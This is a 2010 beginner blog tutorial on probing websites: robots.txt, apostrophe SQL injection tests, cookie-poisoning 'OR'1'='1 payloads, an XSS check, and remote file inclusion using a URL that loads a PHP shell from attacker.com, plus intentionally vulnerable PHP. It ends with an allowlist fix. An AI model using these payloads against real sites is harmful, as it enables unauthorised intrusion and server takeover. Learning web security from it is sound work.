Wednesday, December 1, 2010

How to Hack Websites & pentesting websites [basic]


How to pentest websites.
For n00bs..

1. Check for robots.txt
Most common directory is
Code:
http://www.site.com/robots.txt

This can contain lots of info, even though not all sites have it. It can often indicate where the admin directory is too.
robots.txt is used to ask the Google bot (and other crawlers) to stay out of certain parts of a forum or website. It is only a request to well-behaved crawlers, not access control: anyone can read it, which is exactly why listing admin paths in it gives those paths away.

It looks like this:
Code:
User-agent: *
Disallow: /forum/admin.php
Disallow: /forum/moderator.php
Disallow: /forum/include.php


2. Check for SQL Injection vulnerabilities
This is done by putting a ' (apostrophe) at the end of a URL parameter value.
Like this:
Code:
http://www.victim.com/news.php?id=1'

If you see some kind of error, then most likely the site is vulnerable.
This is classic, or error-based, SQL injection. We'll discuss blind SQL injection another time.

3. Cookie poisoning
Even though most sites nowadays filter this, it wouldn't kill you to try.
We will do this... with JavaScript.
It's really simple, try this in the address bar:
Code:
javascript:alert(document.cookie);

In some cases this may spill out your username and password.
This is the part where you try the famous line...
Code:
javascript:void(document.cookie="username='OR'1'=' 1"); void(document.cookie="password='OR'1'='1");

Similar to SQL injection, you guessed it.


4. Check if site is vulnerable to Cross Site Script (XSS)
XSS and JavaScript together open up a huge horizon of possibilities and a whole lot of new places to discover.
Check if the site is vulnerable by typing this in a web form or similar input field.
Code:


If the site is vulnerable, then you will get a popup message saying awdwdadwd (yes, this was random).
You can find more detailed articles on XSS on milw0rm or similar sites.


5. Remote File Inclusion (RFI)
RFI, or Remote File Inclusion, is where the attacker tries to inject his own PHP code into your PHP app... and if he's successful, he can do whatever he wants on the server.
OK, so let's say we have a website coded in PHP and it uses something like page=page.html to decide which page is to be displayed. The code will look something like this:
Code:
<?php
$file = $_GET['page']; // ourpage: taken straight from the URL, with no checks
include($file);        // so whatever the user sent is included and executed
?>

What this means is that whatever gets passed to page will get included inside the PHP page. It goes like this:

Code:
http://www.victim.com/contact.php?page=http://www.attacker.com/phpshell.txt?

The code the webserver actually executes is effectively this:
Code:
<?php
$file = "http://www.attacker.com/phpshell.txt?"; // this is what $_GET['page'] held
include($file); // $file is the PHP shell, fetched and run by the server
?>

We just executed our code on the targeted server.
Well, this was all folks, hope you enjoyed it.
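The same page-selection feature written so the request can never choose a path, as an added example that is not from the original post; the page names and the ./pages/ directory are assumptions:

```php
<?php
// Added example (not from the original post): the "?page=" feature rewritten
// so the request only picks a key from a fixed map, never a path.
// Assumed: the pages live in ./pages/ and have the hypothetical names below.

// 1. Allowlist. Nothing from the request is ever used as a file name, so
//    "page=http://..." or "page=../../etc/passwd" simply is not a known key.
$pages = [
    'home'    => 'home.html',
    'contact' => 'contact.html',
    'about'   => 'about.html',
];

$name = isset($_GET['page']) ? (string) $_GET['page'] : 'home';

if (!array_key_exists($name, $pages)) {
    http_response_code(404);
    echo 'No such page';
    exit;
}

// 2. Build the path from our own constants only, then confirm it resolves
//    inside the pages directory (a second check in case the map is edited later).
$base = realpath(__DIR__ . '/pages');
$file = realpath($base . '/' . $pages[$name]);

if ($base === false || $file === false
    || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
    http_response_code(500);
    exit;
}

include $file;
```

Keeping allow_url_include=Off in php.ini (the default) additionally stops include() from fetching http:// URLs at all, but the allowlist is still what prevents arbitrary local files from being pulled in.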

It's beginner stuff, and I'm not going into detail till later; I will post more tutorials targeted at a certain type of web hacking such as SQL injection or RFI to teach you how to do it.
